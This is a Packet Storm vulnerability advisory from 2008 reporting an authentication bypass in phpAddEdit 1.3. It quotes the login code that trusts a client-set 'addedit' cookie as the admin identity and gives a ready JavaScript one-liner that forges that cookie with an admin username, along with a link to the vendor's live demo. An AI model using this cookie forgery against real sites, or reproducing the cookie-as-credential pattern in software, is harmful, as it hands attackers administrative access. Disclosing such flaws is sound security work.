phpAddEdit 1.3 Login Bypass

2008-12-12T00:00:00
ID PACKETSTORM:72904
Type packetstorm
Reporter X0r
Modified 2008-12-12T00:00:00

Description

                                        
                                            `-------------------------------------  
PhpAddEdit 1.3 Login By Pass   
-------------------------------------  
  
Found By: x0r ( Evolution Team )  
Email: andry2000@hotmail.it  
-------------------------------------  
  
Bug In: Addedit-login.php  
  
if (!$login_error) {  
// --- Set admin cookie so favorite form field will show up when I use  
the site...  
if ($_POST["rememberme"]) {  
$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));  
setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);  
} else {  
setcookie("addedit", $_POST["adminuser"]);  
}  
Header("Location: ./");  
}  
}  
  
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^  
-------------------------------------  
  
Exploit:  
  
javascript:document.cookie = "addedit=[adminuser]; path=/";  
  
es:  
  
javascript:document.cookie = "addedit=x0r; path=/";  
--------------------------------------  
Live Demo: http://www.phpaddedit.com/demo/  
--------------------------------------  
Greetz: Amore oggi +65 ti amo troppo.  
  
  
`